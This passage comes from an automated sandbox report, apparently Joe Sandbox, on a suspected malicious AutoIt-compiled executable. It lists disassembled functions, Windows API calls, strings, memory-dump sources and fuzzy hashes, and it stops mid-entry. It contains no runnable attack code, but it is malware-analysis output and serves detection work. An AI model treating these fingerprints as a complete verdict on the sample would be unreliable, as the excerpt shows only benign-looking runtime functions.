Opcode Fuzzy Hash: 9206d5eccf4610a2dc7c8d33d48c605266b76304df2fbda2681d3050aff74f36
Instruction Fuzzy Hash: 2821A332500258ABDF198FA4CC46FEA3B6AEF48724F110218FE156B1D0DA79AD51DFA0

Function 007C6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C6D70

Strings

Listbox, xrefs: 007C6D08

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 291762219847ca3862956af3ae7b00984439c69dc919c5212d78e34b9fb57e12
Instruction ID: 911c62632d57c6b41799f78b12f11470f1b6ccb67786ea120184ca7f856b876f
Opcode Fuzzy Hash: 291762219847ca3862956af3ae7b00984439c69dc919c5212d78e34b9fb57e12
Instruction Fuzzy Hash: B6218072710118BFDF218F54DC85FBB3BAAEF89750F01812CFA459B1A0C679AC519BA0

Function 007B39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 007B3A66

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Strings

%}, xrefs: 007B39F4
, $, xrefs: 007B3AA6
AUTOITCALLVARIABLE%d, xrefs: 007B3A58

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%}
API String ID: 3506404897-4263768361
Opcode ID: 4720546233a8ec38d411c6459ba202b3479916492c5b29ad13b50a80856d67d6
Instruction ID: 1e0bdd1f5da3807281ed49a70cb83b35b44d6f85acf4e012707acc8ff8ef1367
Opcode Fuzzy Hash: 4720546233a8ec38d411c6459ba202b3479916492c5b29ad13b50a80856d67d6
Instruction Fuzzy Hash: DD214F7160021DEBCF14EF64CC86BEE77B9AF44700F504459F555AB282DB38EA45CB62

Function 00798C4B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00798C6D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00798C84
SendMessageW.USER32(?,0000000D,?,00000000), ref: 00798CBC

Strings

@U=u, xrefs: 00798CBC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: c10dc56e549d755a906f0d8e28d38e9daa3e2d8867669a8413b84d0f2482accd
Instruction ID: a312e6a998ea7348b56ad7d5c64ed85cdcfc260ac534de54cc5a013197d7bdb1
Opcode Fuzzy Hash: c10dc56e549d755a906f0d8e28d38e9daa3e2d8867669a8413b84d0f2482accd
Instruction Fuzzy Hash: 0521CF72601118BBDF50DBA8D842DAFB7AEEF46300F10049AE801E3260DB75AD408BB5

Function 007C770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007C7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007C7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007C7794

Strings

msctls_trackbar32, xrefs: 007C7749

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 64b42a1f9518e873c54dda34a41152a8db1c9402e396448f12c60859c967bad7
Instruction ID: 9047aa90a52da42af1ec892fe5ec9d655517f9feb7ecc7174faebf83116f9ee5
Opcode Fuzzy Hash: 64b42a1f9518e873c54dda34a41152a8db1c9402e396448f12c60859c967bad7
Instruction Fuzzy Hash: 2511E372244208BBEF245F65CC05FEB7BADEF88B64F11412CFA45A6190C676E851DF20

Function 007C6920 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007C69A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007C69B1

Strings

@U=u, xrefs: 007C69B1
edit, xrefs: 007C6986

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: @U=u$edit
API String ID: 2978978980-590756393
Opcode ID: d345c75155d04e28de92837294a3e1432f6d4b576e288a1ee4a212cfbe3b7bc2
Instruction ID: 6e482cb053bae746d6b0e7a33a13e13e2e21e622c09dd137e9b2cc694ca4c6e9
Opcode Fuzzy Hash: d345c75155d04e28de92837294a3e1432f6d4b576e288a1ee4a212cfbe3b7bc2
Instruction Fuzzy Hash: BF111C71510208ABEB109E64DC85FFB37AAEB05374F50472CFAA5971E0C779EC91AB60

Function 00798E05 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 0079AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0079AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00798E73

Strings

@U=u, xrefs: 00798E73
ComboBox, xrefs: 00798E12
ListBox, xrefs: 00798E3D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: 501b1e7c4562d30e790460db2a9b78acae40c1d56ff866451dbd1d721038b353
Instruction ID: 46e0f36932b6b1e97838fb780ca264fdea6be664ce720c5ed84ca5674accaf16
Opcode Fuzzy Hash: 501b1e7c4562d30e790460db2a9b78acae40c1d56ff866451dbd1d721038b353
Instruction Fuzzy Hash: 1F01B1B1A01219EB8F18EBA4DC59CFE7369EF46360B144A19F831673E2DF395808D751

Function 00798CFD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 0079AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0079AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00798D6B

Strings

@U=u, xrefs: 00798D6B
ComboBox, xrefs: 00798D0A
ListBox, xrefs: 00798D35

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: f71ee69345edbd494c5538024421b6d09a91c2c72e5d387cbd2ba20ecbf0fbd5
Instruction ID: ee03efdcf3d9e5197bc6528e5c6ce02f6443d42148c1cb786c50eb1e1488224c
Opcode Fuzzy Hash: f71ee69345edbd494c5538024421b6d09a91c2c72e5d387cbd2ba20ecbf0fbd5
Instruction Fuzzy Hash: F901B1B1B41509EBDF18EBA0D95AEFE73A8DF1A340F100019B80163292DF185A08D6A2

Function 00798D82 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 0079AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0079AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00798DEE

Strings

@U=u, xrefs: 00798DEE
ComboBox, xrefs: 00798D8F
ListBox, xrefs: 00798DBA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 372448540-2258501812
Opcode ID: e89948f2ed9701a91b2314dbf36a3d792676e456b6bdabf1bd1300ee6f76db93
Instruction ID: 8505852c69669bfc90e9268f4b43f93ad530b63074bbbd7a56764b79a4c2ac73
Opcode Fuzzy Hash: e89948f2ed9701a91b2314dbf36a3d792676e456b6bdabf1bd1300ee6f76db93
Instruction Fuzzy Hash: C5018FB1B41109F7DF19EAA4D94AEFE77A8DB1A340F104015B80563292DB2D5E08D6B2

Function 007CACCF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,008057B0,007CD809,000000FC,?,00000000,00000000,?,?,?,0077B969,?,?,?,?,?), ref: 007CACD1
GetFocus.USER32 ref: 007CACD9

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

SendMessageW.USER32(0127F3B0,000000B0,000001BC,000001C0), ref: 007CAD4B

Strings

@U=u, xrefs: 007CAD4B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: @U=u
API String ID: 3601265619-2594219639
Opcode ID: c9694270f636eaf917ca172d03a2ef4a7d77da105fb03063f04bbd896fc15b74
Instruction ID: 188376519bb174a2dad587543c7375f56e9272aacddba35f39ae5f4453fe3172
Opcode Fuzzy Hash: c9694270f636eaf917ca172d03a2ef4a7d77da105fb03063f04bbd896fc15b74
Instruction Fuzzy Hash: F30192713009009FCB149B28D888F6677E6FB89326B18427DF826873B5CB35AC46CF51

Function 00756063 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0075603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00756051

SendMessageW.USER32(?,0000000C,00000000,?), ref: 0075607F
GetParent.USER32(?), ref: 00790D46
InvalidateRect.USER32(00000000,?,00753A4F,?,00000000,00000001), ref: 00790D4D

Strings

@U=u, xrefs: 0075607F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID: @U=u
API String ID: 3648793173-2594219639
Opcode ID: 37269a392e2c0ac4638e1cb112ef0ca596724efe94104b5a7a2ead2e48aea15e
Instruction ID: 5b85a45b65538ed0b932e9a5c7aeaa1268beea1c5d0da61a1279aac1ce6ab09f
Opcode Fuzzy Hash: 37269a392e2c0ac4638e1cb112ef0ca596724efe94104b5a7a2ead2e48aea15e
Instruction Fuzzy Hash: D3F0A030200214FBEF201F60DC09FE57B5AAB01742F608428F988AB0E0DAFA6844AB50

Function 00744B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00744AD0), ref: 00744B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00744B57

Strings

kernel32.dll, xrefs: 00744B40
GetNativeSystemInfo, xrefs: 00744B51

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 70040f60b4dc9a7c4bde9ff266ce44910019255dd7acdbeec4f6421fd6c36c24
Instruction ID: af53ce988de05294294a9ffc21590749b8b82146f22bd36e26d7f6937b5d605e
Opcode Fuzzy Hash: 70040f60b4dc9a7c4bde9ff266ce44910019255dd7acdbeec4f6421fd6c36c24
Instruction Fuzzy Hash: 56D017F4A10B17DFD7209F32E828F06B7E6AF05391B15C83ED486D6150E778E880CA59

Function 00744C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00744B83,?), ref: 00744C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00744C56

Strings

kernel32.dll, xrefs: 00744C3F
Wow64RevertWow64FsRedirection, xrefs: 00744C50

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ac5c00a854537791a7bd701df6fad17397eb66301a524d8e755d0777f0a0600b
Instruction ID: 83b3d8958b58711b154112fc4d36cc515194c0b533e2cca60dc544aaff62447b
Opcode Fuzzy Hash: ac5c00a854537791a7bd701df6fad17397eb66301a524d8e755d0777f0a0600b
Instruction Fuzzy Hash: 4ED05EB0511B27CFD7209F31D948B2AB7E7AF05351B2AC83ED596D6260E77CD880CA60

Function 00744C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00744BD0,?,00744DEF,?,008052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00744C23

Strings

kernel32.dll, xrefs: 00744C0C
Wow64DisableWow64FsRedirection, xrefs: 00744C1D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 83996faba61192b798a7147554eb6e3553b8bfd8a7dca7178a600263ff9ffcb0
Instruction ID: 8fa8334f7cbb185f0dbce9c90256f30f3d82686358a3d637b505f73517dd8dc0
Opcode Fuzzy Hash: 83996faba61192b798a7147554eb6e3553b8bfd8a7dca7178a600263ff9ffcb0
Instruction Fuzzy Hash: BAD0EC74911716CFD7205F71D948A06BAD7AF09351B19C83DD486D6150E7B8D8808660

Function 007C0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,007C1039), ref: 007C0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007C0E07

Strings

advapi32.dll, xrefs: 007C0DF0
RegDeleteKeyExW, xrefs: 007C0E01

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: adfa9a059196acb7abda6cfd116a6f44bdaf2d1e8a117e69f2e10d8375d241e5
Instruction ID: 5765039d991bffe5040d9498801d2d1422fbe1e476b497e6f9f26b3dc1c29f01
Opcode Fuzzy Hash: adfa9a059196acb7abda6cfd116a6f44bdaf2d1e8a117e69f2e10d8375d241e5
Instruction Fuzzy Hash: A8D0C7B044032ACFC320AF74C808B8273E6AF00342F04CC3ED682C6290E6B8D8A0CA84

Function 007B90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,007B8CF4,?,007CF910), ref: 007B90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007B9100

Strings

kernel32.dll, xrefs: 007B90E9
GetModuleHandleExW, xrefs: 007B90FA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: e4d4d4ecaaf371f85dc08dcb5e261a5e0a841cd238256f9550527e8253097ab7
Instruction ID: eab731698ae8086d275f10500a1b0ee234aa8550115d4d15dfdb3481562337a7
Opcode Fuzzy Hash: e4d4d4ecaaf371f85dc08dcb5e261a5e0a841cd238256f9550527e8253097ab7
Instruction Fuzzy Hash: DCD0127551071BCFD7209F35D818B4677D6AF05351B15C83DD696D6650E778C880C650

Function 00781714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00781718
__swprintf.LIBCMT ref: 00781749

Strings

%.3d, xrefs: 00781723
WIN_XPe, xrefs: 00781788

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
